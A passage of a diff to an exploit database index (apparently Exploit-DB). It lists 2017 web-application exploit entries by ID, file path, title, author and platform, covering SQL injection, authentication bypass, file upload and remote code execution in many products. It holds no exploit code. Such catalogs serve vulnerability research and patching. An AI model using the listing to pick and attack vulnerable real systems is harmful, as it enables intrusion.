Restrictions",2017-09-05,"Ibad Shah",webapps,hardware, +42651,exploits/hardware/webapps/42651.txt,"WiseGiga NAS - Multiple Vulnerabilities",2017-09-11,"Pierre Kim",webapps,hardware, +42653,exploits/php/webapps/42653.txt,"PHP Dashboards NEW 4.4 - Arbitrary File Read",2017-09-11,"Ihsan Sencan",webapps,php, +42654,exploits/php/webapps/42654.txt,"PHP Dashboards NEW 4.4 - SQL Injection",2017-09-11,"Ihsan Sencan",webapps,php, +42655,exploits/php/webapps/42655.txt,"JobStar Monster Clone Script 1.0 - SQL Injection",2017-09-11,8bitsec,webapps,php, +42656,exploits/php/webapps/42656.txt,"iTech Book Store Script 2.02 - SQL Injection",2017-09-11,8bitsec,webapps,php, +42657,exploits/php/webapps/42657.txt,"iTech StockPhoto Script 2.02 - SQL Injection",2017-09-11,8bitsec,webapps,php, +42658,exploits/php/webapps/42658.txt,"EduStar Udemy Clone Script 1.0 - SQL Injection",2017-09-11,8bitsec,webapps,php, +42659,exploits/php/webapps/42659.txt,"AirStar Airbnb Clone Script 1.0 - SQL Injection",2017-09-11,8bitsec,webapps,php, +42660,exploits/php/webapps/42660.txt,"osTicket 1.10 - SQL Injection",2017-09-12,"Mehmet Ince",webapps,php, +42661,exploits/php/webapps/42661.txt,"FoodStar 1.0 - SQL Injection",2017-09-12,"Ihsan Sencan",webapps,php, +42662,exploits/php/webapps/42662.txt,"Gr8 Multiple Search Engine Script 1.0 - SQL Injection",2017-09-12,"Ihsan Sencan",webapps,php, +42663,exploits/php/webapps/42663.txt,"inClick Cloud Server 5.0 - SQL Injection",2017-09-12,"Ihsan Sencan",webapps,php, +42667,exploits/php/webapps/42667.txt,"ICLowBidAuction 3.3 - SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php, +42668,exploits/php/webapps/42668.txt,"ICMLM 2.1 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php, +42669,exploits/php/webapps/42669.txt,"ICHotelReservation 3.3 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php, +42670,exploits/php/webapps/42670.txt,"ICAuction 2.2 - 'id' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php, +42671,exploits/php/webapps/42671.txt,"ICDoctor Appointment 1.3 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php, +42672,exploits/php/webapps/42672.txt,"ICRestaurant software 1.4 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php, +42673,exploits/php/webapps/42673.txt,"ICDutchAuction 1.2 - SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php, +42674,exploits/php/webapps/42674.txt,"ICAutosales 2.2 - SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php, +42675,exploits/php/webapps/42675.txt,"ICTraveling 2.2 - Authentication Bypass",2017-09-13,"Ihsan Sencan",webapps,php, +42677,exploits/php/webapps/42677.txt,"ICStudents 1.2 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php, +42676,exploits/php/webapps/42676.txt,"ICClassifieds 1.1 - SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php, +42678,exploits/php/webapps/42678.txt,"ICSurvey 1.1 - SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php, +42679,exploits/php/webapps/42679.txt,"ICJewelry 1.1 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php, +42680,exploits/php/webapps/42680.txt,"IC-T-Shirt 1.2 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php, +42681,exploits/php/webapps/42681.txt,"ICProductConfigurator 1.1 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php, +42682,exploits/php/webapps/42682.txt,"ICGrocery 1.1 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php, +42684,exploits/php/webapps/42684.txt,"ICCallLimousine 1.1 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php, +42685,exploits/php/webapps/42685.txt,"ICProjectBidding 1.1 - SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php, +42686,exploits/php/webapps/42686.txt,"ICDental Clinic 1.2 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php, +42687,exploits/aspx/webapps/42687.txt,"ICEstate 1.1 - 'id' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,aspx, +42688,exploits/php/webapps/42688.txt,"ICHelpDesk 1.1 - 'pk' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php, +42689,exploits/php/webapps/42689.txt,"ICSiteBuilder 1.1 - SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php, +42690,exploits/asp/webapps/42690.txt,"ICAffiliateTracking 1.1 - Authentication Bypass",2017-09-13,"Ihsan Sencan",webapps,asp, +42699,exploits/windows/webapps/42699.rb,"Indusoft Web Studio - Directory Traversal Information Disclosure (Metasploit)",2017-09-13,"James Fitts",webapps,windows, +42705,exploits/windows/webapps/42705.rb,"Carlo Gavazzi Powersoft 2.1.1.1 - Directory Traversal File Disclosure (Metasploit)",2017-09-13,"James Fitts",webapps,windows, +42706,exploits/windows/webapps/42706.rb,"Carel PlantVisor 2.4.4 - Directory Traversal Information Disclosure (Metasploit)",2017-09-13,"James Fitts",webapps,windows, +42707,exploits/windows/webapps/42707.txt,"Carel PlantVisor 2.4.4 - Directory Traversal",2011-09-13,"Luigi Auriemma",webapps,windows, +42713,exploits/php/webapps/42713.txt,"Enterprise Edition Payment Processor Script 3.7 - SQL Injection",2017-09-14,"Ihsan Sencan",webapps,php, +42714,exploits/php/webapps/42714.txt,"Adserver Script 5.6 - SQL Injection",2017-09-14,"Ihsan Sencan",webapps,php, +42715,exploits/php/webapps/42715.txt,"PTC KSV1 Script 1.7 - 'type' SQL Injection",2017-09-14,"Ihsan Sencan",webapps,php, +42716,exploits/php/webapps/42716.txt,"Theater Management Script - SQL Injection",2017-09-14,"Ihsan Sencan",webapps,php, +42717,exploits/php/webapps/42717.txt,"Justdial Clone Script - 'fid' SQL Injection",2017-09-14,"Ihsan Sencan",webapps,php, +42727,exploits/php/webapps/42727.txt,"XYZ Auto Classifieds 1.0 - SQL Injection",2017-09-12,8bitsec,webapps,php, +42728,exploits/php/webapps/42728.txt,"Consumer Review Script 1.0 - SQL Injection",2017-09-12,8bitsec,webapps,php, +42729,exploits/hardware/webapps/42729.py,"D-Link DIR-8xx Routers - Leak Credentials",2017-09-12,embedi,webapps,hardware, +42730,exploits/hardware/webapps/42730.py,"D-Link DIR-8xx Routers - Root Remote Code Execution",2017-09-12,embedi,webapps,hardware, +42731,exploits/hardware/webapps/42731.sh,"D-Link DIR-8xx Routers - Local Firmware Upload",2017-09-12,embedi,webapps,hardware, +42732,exploits/hardware/webapps/42732.py,"Humax Wi-Fi Router HG100R 2.0.6 - Authentication Bypass",2017-09-14,Kivson,webapps,hardware, +42733,exploits/php/webapps/42733.txt,"PTCEvolution 5.50 - SQL Injection",2017-09-15,"Ihsan Sencan",webapps,php, +42734,exploits/php/webapps/42734.txt,"Contact Manager 1.0 - 'femail' SQL Injection",2017-09-15,"Ihsan Sencan",webapps,php, +42736,exploits/asp/webapps/42736.py,"Digirez 3.4 - Cross-Site Request Forgery (Update Admin)",2017-09-18,"Ihsan Sencan",webapps,asp, +42737,exploits/asp/webapps/42737.py,"Digileave 1.2 - Cross-Site Request Forgery (Update Admin)",2017-09-18,"Ihsan Sencan",webapps,asp, +42738,exploits/asp/webapps/42738.py,"DigiAffiliate 1.4 - Cross-Site Request Forgery (Update Admin)",2017-09-18,"Ihsan Sencan",webapps,asp, +42739,exploits/hardware/webapps/42739.txt,"UTStar WA3002G4 ADSL Broadband Modem - Authentication Bypass",2017-09-15,"Gem George",webapps,hardware, +42740,exploits/hardware/webapps/42740.txt,"iBall ADSL2+ Home Router - Authentication Bypass",2017-09-18,"Gem George",webapps,hardware, +42745,exploits/linux/webapps/42745.py,"Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak",2017-09-18,"Hanno Bock",webapps,linux, +42751,exploits/php/webapps/42751.txt,"Foodspotting Clone 1.0 - SQL Injection",2017-09-13,8bitsec,webapps,php, +42752,exploits/php/webapps/42752.txt,"iTech Gigs Script 1.20 - 'cat' SQL Injection",2017-09-15,8bitsec,webapps,php, +42754,exploits/php/webapps/42754.txt,"Tecnovision DLX Spot - Authentication Bypass",2017-05-19,"Simon Brannstrom",webapps,php, +42755,exploits/php/webapps/42755.txt,"Tecnovision DLX Spot - Arbitrary File Upload",2017-05-19,"Simon Brannstrom",webapps,php, +42761,exploits/php/webapps/42761.txt,"PHPMyFAQ 2.9.8 - Cross-Site Scripting (1)",2017-09-21,"Ishaq Mohammed",webapps,php, +42768,exploits/php/webapps/42768.pl,"Stock Photo Selling 1.0 - SQL Injection",2017-09-22,"Ihsan Sencan",webapps,php, +42769,exploits/linux/webapps/42769.rb,"DenyAll WAF < 6.3.0 - Remote Code Execution (Metasploit)",2017-09-19,"Mehmet Ince",webapps,linux, +42770,exploits/php/webapps/42770.txt,"Lending And Borrowing - 'pid' SQL Injection",2017-09-22,"Ihsan Sencan",webapps,php, +42771,exploits/php/webapps/42771.txt,"Multi Level Marketing - SQL Injection",2017-09-22,"Ihsan Sencan",webapps,php, +42772,exploits/php/webapps/42772.pl,"Cash Back Comparison Script 1.0 - SQL Injection",2017-09-22,"Ihsan Sencan",webapps,php, +42773,exploits/php/webapps/42773.txt,"Claydip Airbnb Clone 1.0 - Arbitrary File Upload",2017-09-22,"Ihsan Sencan",webapps,php, +42774,exploits/php/webapps/42774.txt,"Secure E-commerce Script 1.02 - 'sid' SQL Injection",2017-09-22,8bitsec,webapps,php, +42775,exploits/php/webapps/42775.txt,"PHP Auction Ecommerce Script 1.6 - SQL Injection",2017-09-22,8bitsec,webapps,php, +42776,exploits/asp/webapps/42776.txt,"JitBit HelpDesk < 9.0.2 - Authentication Bypass",2017-09-22,Kc57,webapps,asp, +42785,exploits/hardware/webapps/42785.sh,"FLIR Thermal Camera PT-Series (PT-334 200562) - Root Remote Code Execution",2017-09-25,LiquidWorm,webapps,hardware, +42786,exploits/hardware/webapps/42786.txt,"FLIR Thermal Camera F/FC/PT/D - Information Disclosure",2017-09-25,LiquidWorm,webapps,hardware, +42788,exploits/hardware/webapps/42788.txt,"FLIR Thermal Camera FC-S/PT - Command Injection",2017-09-25,LiquidWorm,webapps,hardware, +42789,exploits/hardware/webapps/42789.txt,"FLIR Thermal Camera F/FC/PT/D - Stream Disclosure",2017-09-25,LiquidWorm,webapps,hardware, +42792,exploits/asp/webapps/42792.txt,"Sitefinity CMS 9.2 - Cross-Site Scripting",2017-08-31,"Pralhad Chaskar",webapps,asp, +42794,exploits/php/webapps/42794.txt,"WordPress Plugin Content Timeline - SQL Injection",2017-09-16,"Jeroen - IT Nerdbox",webapps,php, +42795,exploits/php/webapps/42795.txt,"Job Links - Arbitrary File Upload",2017-09-26,"Ihsan Sencan",webapps,php, +42796,exploits/php/webapps/42796.txt,"TicketPlus - Arbitrary File Upload",2017-09-26,"Ihsan Sencan",webapps,php, +42797,exploits/php/webapps/42797.txt,"Photo Fusion - Arbitrary File Upload",2017-09-26,"Ihsan Sencan",webapps,php, +42798,exploits/php/webapps/42798.txt,"SMSmaster - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php, +42799,exploits/php/webapps/42799.txt,"AMC Master - Arbitrary File Upload",2017-09-26,"Ihsan Sencan",webapps,php, +42800,exploits/php/webapps/42800.txt,"WordPress Plugin WPCHURCH - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php, +42801,exploits/php/webapps/42801.txt,"WordPress Plugin WPGYM - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php, +42802,exploits/php/webapps/42802.txt,"WordPress Plugin Hospital Management System - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php, +42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple, +42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php, +42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php, +42892,exploits/windows/webapps/42892.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Code Execution / Memory Corruption",2017-09-28,hyp3rlinx,webapps,windows, +42893,exploits/php/webapps/42893.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Information Disclosure",2017-09-28,hyp3rlinx,webapps,php, +42894,exploits/php/webapps/42894.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Server Side Request Forgery",2017-09-28,hyp3rlinx,webapps,php, +42895,exploits/php/webapps/42895.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - 'Host' Header Injection",2017-09-28,hyp3rlinx,webapps,php, +42916,exploits/hardware/webapps/42916.py,"Roteador Wireless Intelbras WRN150 - Autentication Bypass",2017-09-28,"Elber Tavares",webapps,hardware, +42919,exploits/php/webapps/42919.txt,"Easy Blog PHP Script 1.3a - 'id' SQL Injection",2017-09-28,8bitsec,webapps,php, +42922,exploits/php/webapps/42922.py,"FileRun < 2017.09.18 - SQL Injection",2017-09-29,SPARC,webapps,php, +42923,exploits/aspx/webapps/42923.txt,"SmarterStats 11.3.6347 - Cross-Site Scripting",2017-09-27,sqlhacker,webapps,aspx, +42924,exploits/php/webapps/42924.txt,"WordPress Plugin WPHRM - SQL Injection",2017-09-29,"Ihsan Sencan",webapps,php, +42925,exploits/php/webapps/42925.txt,"PHP Multi Vendor Script 1.02 - 'sid' SQL Injection",2017-09-28,8bitsec,webapps,php, +42926,exploits/php/webapps/42926.txt,"Real Estate MLM plan script 1.0 - 'srch' SQL Injection",2017-09-28,8bitsec,webapps,php, +42927,exploits/php/webapps/42927.txt,"ConverTo Video Downloader & Converter 1.4.1 - Arbitrary File Download",2017-09-29,"Ihsan Sencan",webapps,php, +42931,exploits/hardware/webapps/42931.txt,"HBGK DVR 3.0.0 build20161206 - Authentication Bypass",2017-09-24,"RAT - ThiefKing",webapps,hardware, +42933,exploits/hardware/webapps/42933.txt,"NPM-V (Network Power Manager) 2.4.1 - Password Reset",2017-10-02,"Saeed reza Zamanian",webapps,hardware, +42934,exploits/php/webapps/42934.txt,"phpCollab 2.5.1 - Arbitrary File Upload",2017-10-02,Sysdream,webapps,php, +42935,exploits/php/webapps/42935.txt,"phpCollab 2.5.1 - SQL Injection",2017-10-02,Sysdream,webapps,php, +42939,exploits/jsp/webapps/42939.txt,"OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'jobRunId' SQL Injection",2017-10-02,"Marcin Woloszyn",webapps,jsp, +42940,exploits/jsp/webapps/42940.txt,"OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'documentId' SQL Injection",2017-10-02,"Marcin Woloszyn",webapps,jsp, +42947,exploits/hardware/webapps/42947.txt,"Fiberhome AN5506-04-F - Command Injection",2017-10-03,Tauco,webapps,hardware, +42950,exploits/php/webapps/42950.txt,"EPESI 1.8.2 rev20170830 - Cross-Site Scripting",2017-10-03,"Zeeshan Shaikh",webapps,php, +42953,exploits/windows/webapps/42953.txt,"Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (1)",2017-09-20,xxlegend,webapps,windows, +42954,exploits/php/webapps/42954.py,"ClipBucket 2.8.3 - Remote Code Execution",2017-10-04,"Meisam Monsef",webapps,php, +42956,exploits/hardware/webapps/42956.txt,"NETGEAR ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution",2017-09-27,"Kacper Szurek",webapps,hardware, +42959,exploits/php/webapps/42959.py,"Unitrends UEB 9.1 - Privilege Escalation",2017-08-08,"Jared Arave",webapps,php, +42961,exploits/ruby/webapps/42961.txt,"Metasploit < 4.14.1-20170828 - Cross-Site Request Forgery",2017-08-30,"Dhiraj Mishra",webapps,ruby, +42966,exploits/jsp/webapps/42966.py,"Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2)",2017-10-09,intx0x80,webapps,jsp, +42967,exploits/php/webapps/42967.txt,"ClipShare 7.0 - SQL Injection",2017-10-09,8bitsec,webapps,php, +42968,exploits/php/webapps/42968.txt,"Complain Management System - Hard-Coded Credentials / Blind SQL injection",2017-10-10,havysec,webapps,php, +43013,exploits/cgi/webapps/43013.txt,"Linksys E Series - Multiple Vulnerabilities",2017-10-18,"SEC Consult",webapps,cgi, +42971,exploits/php/webapps/42971.rb,"Trend Micro OfficeScan 11.0/XG (12.0) - Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",webapps,php, +42972,exploits/php/webapps/42972.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",webapps,php, +42975,exploits/linux/webapps/42975.txt,"Trend Micro Data Loss Prevention Virtual Appliance 5.2 - Path Traversal",2017-10-11,"Leonardo Duarte",webapps,linux, +42978,exploits/php/webapps/42978.txt,"OctoberCMS 1.0.425 (Build 425) - Cross-Site Scripting",2017-10-12,"Ishaq Mohammed",webapps,php, +42979,exploits/php/webapps/42979.txt,"E-Sic Software livre CMS - 'q' SQL Injection",2017-10-12,"Guilherme Assmann",webapps,php, +42980,exploits/php/webapps/42980.txt,"E-Sic Software livre CMS - Autentication Bypass",2017-10-12,"Elber Tavares",webapps,php, +42981,exploits/php/webapps/42981.txt,"E-Sic Software livre CMS - 'cpfcnpj' SQL Injection",2017-10-12,"Elber Tavares",webapps,php, +42982,exploits/php/webapps/42982.txt,"E-Sic Software livre CMS - 'f' SQL Injection",2017-10-12,"Elber Tavares",webapps,php, +42983,exploits/php/webapps/42983.txt,"E-Sic Software livre CMS - Cross Site Scripting",2017-10-12,"Elber Tavares",webapps,php, +42985,exploits/php/webapps/42985.txt,"TYPO3 Extension Restler 1.7.0 - Local File Disclosure",2017-10-13,CrashBandicot,webapps,php, +42986,exploits/hardware/webapps/42986.txt,"Dreambox Plugin BouquetEditor - Cross-Site Scripting",2017-10-12,"Thiago Sena",webapps,hardware, +42987,exploits/php/webapps/42987.txt,"phpMyFAQ 2.9.8 - Cross-Site Scripting (2)",2017-10-13,"Ishaq Mohammed",webapps,php, +42988,exploits/php/webapps/42988.txt,"AlienVault Unified Security Management (USM) 5.4.2 - Cross-Site Request Forgery",2017-10-13,"Julien Ahrens",webapps,php, +42989,exploits/cgi/webapps/42989.txt,"Webmin 1.850 - Multiple Vulnerabilities",2017-10-15,hyp3rlinx,webapps,cgi, +42991,exploits/linux/webapps/42991.txt,"3CX Phone System 15.5.3554.1 - Directory Traversal",2017-10-16,"Jens Regel",webapps,linux, +42993,exploits/php/webapps/42993.txt,"Squid Analysis Report Generator 2.3.10 - Remote Code Execution",2017-10-17,"Pavel Suprunyuk",webapps,php, +43002,exploits/multiple/webapps/43002.py,"OpenText Documentum Content Server - Privilege Escalation",2017-10-17,"Andrey B. Panfilov",webapps,multiple, +43003,exploits/multiple/webapps/43003.py,"OpenText Documentum Content Server - Arbitrary File Download Privilege Escalation",2017-10-17,"Andrey B. Panfilov",webapps,multiple, +43004,exploits/multiple/webapps/43004.py,"OpenText Documentum Content Server - 'dmr_content' Privilege Escalation",2017-10-17,"Andrey B. Panfilov",webapps,multiple, +43005,exploits/multiple/webapps/43005.py,"OpenText Documentum Content Server - Arbitrary File Download",2017-10-17,"Andrey B. Panfilov",webapps,multiple, +43009,exploits/xml/webapps/43009.txt,"Apache Solr 7.0.1 - XML External Entity Expansion / Remote Code Execution",2017-10-17,"Michael Stepankin & Olga Barinova",webapps,xml, +43011,exploits/php/webapps/43011.txt,"Career Portal 1.0 - SQL Injection",2017-10-17,8bitsec,webapps,php, +43012,exploits/php/webapps/43012.txt,"WordPress Plugin Car Park Booking - SQL Injection",2017-10-17,8bitsec,webapps,php, +43015,exploits/php/webapps/43015.txt,"Afian AB FileRun 2017.03.18 - Multiple Vulnerabilities",2017-10-18,"SEC Consult",webapps,php, +43023,exploits/hardware/webapps/43023.txt,"TP-Link TL-MR3220 - Cross-Site Scripting",2017-10-12,"Thiago Sena",webapps,hardware, +43018,exploits/windows/webapps/43018.html,"ZKTime Web Software 2.0 - Cross-Site Request Forgery",2017-08-18,"Arvind V",webapps,windows, +43019,exploits/windows/webapps/43019.txt,"ZKTime Web Software 2.0 - Improper Access Restrictions",2017-08-18,"Arvind V",webapps,windows, +43021,exploits/python/webapps/43021.py,"Check_MK 1.2.8p25 - Information Disclosure",2017-10-18,"Julien Ahrens",webapps,python, +43022,exploits/hardware/webapps/43022.py,"TP-Link WR940N - Authenticated Remote Code",2017-10-17,"Fidus InfoSecurity",webapps,hardware, +43024,exploits/multiple/webapps/43024.txt,"Logitech Media Server - Cross-Site Scripting",2017-10-14,"Thiago Sena",webapps,multiple, +43027,exploits/php/webapps/43027.txt,"CometChat < 6.2.0 BETA 1 - Local File Inclusion",2017-10-22,Paradoxis,webapps,php, +43028,exploits/php/webapps/43028.py,"Kaltura < 13.2.0 - Remote Code Execution",2017-10-23,"Robin Verton",webapps,php, +43034,exploits/php/webapps/43034.txt,"FS Car Rental Script - 'pickup_location' SQL Injection",2017-10-23,8bitsec,webapps,php, +43035,exploits/php/webapps/43035.txt,"FS Amazon Clone - 'category_id' SQL Injection",2017-10-23,8bitsec,webapps,php, +43036,exploits/php/webapps/43036.txt,"FS Book Store Script - 'category' SQL Injection",2017-10-23,8bitsec,webapps,php, +43037,exploits/php/webapps/43037.txt,"FS Ebay Clone - 'pd_maincat_id' SQL Injection",2017-10-23,8bitsec,webapps,php, +43038,exploits/php/webapps/43038.txt,"FS Food Delivery Script - 'keywords' SQL Injection",2017-10-23,8bitsec,webapps,php, +43039,exploits/php/webapps/43039.txt,"FS Expedia Clone - 'hid' SQL Injection",2017-10-23,8bitsec,webapps,php, +43040,exploits/php/webapps/43040.txt,"FS Freelancer Clone - 'sk' SQL Injection",2017-10-23,8bitsec,webapps,php, +43041,exploits/php/webapps/43041.txt,"FS Groupon Clone - 'category' SQL Injection",2017-10-23,8bitsec,webapps,php, +43042,exploits/php/webapps/43042.txt,"FS Indiamart Clone - 'keywords' SQL Injection",2017-10-23,8bitsec,webapps,php, +43043,exploits/php/webapps/43043.txt,"FS Lynda Clone - 'category' SQL Injection",2017-10-23,8bitsec,webapps,php, +43044,exploits/php/webapps/43044.txt,"FS OLX Clone - 'catg_id' SQL Injection",2017-10-23,8bitsec,webapps,php, +43045,exploits/cfm/webapps/43045.txt,"Mura CMS < 6.2 - Server-Side Request Forgery / XML External Entity Injection",2017-10-24,"Anthony Cole",webapps,cfm, +43046,exploits/php/webapps/43046.txt,"FS Shutter Stock Clone - 'keywords' SQL Injection",2017-10-24,8bitsec,webapps,php, +43047,exploits/php/webapps/43047.txt,"FS Thumbtack Clone - 'ser' SQL Injection",2017-10-24,8bitsec,webapps,php, +43048,exploits/php/webapps/43048.txt,"FS Trademe Clone - 'id' SQL Injection",2017-10-24,8bitsec,webapps,php, +43049,exploits/php/webapps/43049.txt,"FS Monster Clone - 'id' SQL Injection",2017-10-24,8bitsec,webapps,php, +43050,exploits/php/webapps/43050.txt,"FS Care Clone - 'sitterService' SQL Injection",2017-10-24,8bitsec,webapps,php, +43051,exploits/php/webapps/43051.txt,"FS Crowdfunding Script - 'id' SQL Injection",2017-10-24,8bitsec,webapps,php, +43052,exploits/php/webapps/43052.txt,"FS Realtor Clone - 'id' SQL Injection",2017-10-24,8bitsec,webapps,php, +43053,exploits/nodejs/webapps/43053.txt,"KeystoneJS 4.0.0-beta.5 - CSV Excel Macro Injection",2017-10-25,"Ishaq Mohammed",webapps,nodejs, +43054,exploits/nodejs/webapps/43054.txt,"KeystoneJS 4.0.0-beta.5 - Cross-Site Scripting",2017-10-25,"Ishaq Mohammed",webapps,nodejs, +43062,exploits/php/webapps/43062.txt,"PHP Melody 2.6.1 - SQL Injection",2017-10-28,"Venkat Rajgor",webapps,php, +43063,exploits/php/webapps/43063.txt,"PHPMyFAQ 2.9.8 - Cross-Site Scripting (3)",2017-10-28,"Nikhil Mittal",webapps,php, +43064,exploits/php/webapps/43064.txt,"phpMyFAQ 2.9.8 - Cross-Site Request Forgery",2017-10-27,"Nikhil Mittal",webapps,php, +43065,exploits/php/webapps/43065.py,"WordPress Plugin Ultimate Product Catalog 4.2.24 - PHP Object Injection",2017-10-30,tomplixsee,webapps,php, +43066,exploits/php/webapps/43066.txt,"Zomato Clone Script - 'resid' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php, +43067,exploits/php/webapps/43067.txt,"Website Broker Script - 'status_id' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php, +43068,exploits/php/webapps/43068.txt,"Vastal I-Tech Agent Zone - SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php, +43069,exploits/php/webapps/43069.txt,"Php Inventory - Arbitrary File Upload",2017-10-30,"Ihsan Sencan",webapps,php, +43070,exploits/php/webapps/43070.txt,"Online Exam Test Application - 'sort' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php, +43071,exploits/php/webapps/43071.txt,"Nice PHP FAQ Script - 'nice_theme' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php, +43072,exploits/php/webapps/43072.txt,"Fake Magazine Cover Script - SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php, +43073,exploits/php/webapps/43073.txt,"CPA Lead Reward Script - SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php, +43074,exploits/php/webapps/43074.txt,"Basic B2B Script - SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php, +43075,exploits/php/webapps/43075.txt,"CmsLite 1.4 - 'S' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php, +43076,exploits/php/webapps/43076.txt,"MyMagazine 1.0 - 'id' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php, +43077,exploits/php/webapps/43077.txt,"News 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php, +43078,exploits/php/webapps/43078.txt,"Newspaper 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php, +43079,exploits/php/webapps/43079.txt,"US Zip Codes Database - 'state' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php, +43080,exploits/php/webapps/43080.txt,"Shareet - 'photo' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php, +43081,exploits/php/webapps/43081.txt,"AROX School ERP PHP Script - 'id' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php, +43082,exploits/php/webapps/43082.txt,"Protected Links - SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php, +43083,exploits/php/webapps/43083.txt,"ZeeBuddy 2x - 'groupid' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php, +43084,exploits/php/webapps/43084.txt,"Vastal I-Tech Dating Zone 0.9.9 - 'product_id' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php, +43085,exploits/php/webapps/43085.txt,"tPanel 2009 - Authentication Bypass",2017-10-30,"Ihsan Sencan",webapps,php, +43086,exploits/php/webapps/43086.txt,"Sokial Social Network Script 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php, +43087,exploits/php/webapps/43087.txt,"SoftDatepro Dating Social Network 1.3 - SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php, +43088,exploits/php/webapps/43088.txt,"Same Sex Dating Software Pro 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php, +43089,exploits/php/webapps/43089.txt,"PHP CityPortal 2.0 - SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php, +43090,exploits/php/webapps/43090.txt,"PG All Share Video 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php, +43091,exploits/php/webapps/43091.txt,"MyBuilder Clone 1.0 - 'subcategory' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php, +43092,exploits/php/webapps/43092.txt,"Mailing List Manager Pro 3.0 - SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php, +43093,exploits/php/webapps/43093.txt,"Joomla! Component Zh YandexMap 6.1.1.0 - 'placemarklistid' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php, +43094,exploits/php/webapps/43094.txt,"Joomla! Component NS Download Shop 2.2.6 - 'id' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php, +43095,exploits/php/webapps/43095.txt,"Job Board Script - 'nice_theme' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php, +43096,exploits/php/webapps/43096.txt,"iTech Gigs Script 1.21 - SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php, +43097,exploits/php/webapps/43097.txt,"iStock Management System 1.0 - Arbitrary File Upload",2017-10-30,"Ihsan Sencan",webapps,php, +43098,exploits/php/webapps/43098.txt,"iProject Management System 1.0 - 'ID' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php, +43099,exploits/php/webapps/43099.txt,"Article Directory Script 3.0 - 'id' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php, +43100,exploits/php/webapps/43100.txt,"Adult Script Pro 2.2.4 - SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php, +43101,exploits/php/webapps/43101.txt,"D-Park Pro 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php, +43102,exploits/php/webapps/43102.txt,"Ingenious 2.3.0 - Arbitrary File Upload",2017-10-30,"Ihsan Sencan",webapps,php, +43103,exploits/xml/webapps/43103.py,"Oracle Java SE - Web Start jnlp XML External Entity Processing Information Disclosure",2017-10-30,mr_me,webapps,xml, +43106,exploits/php/webapps/43106.txt,"OctoberCMS 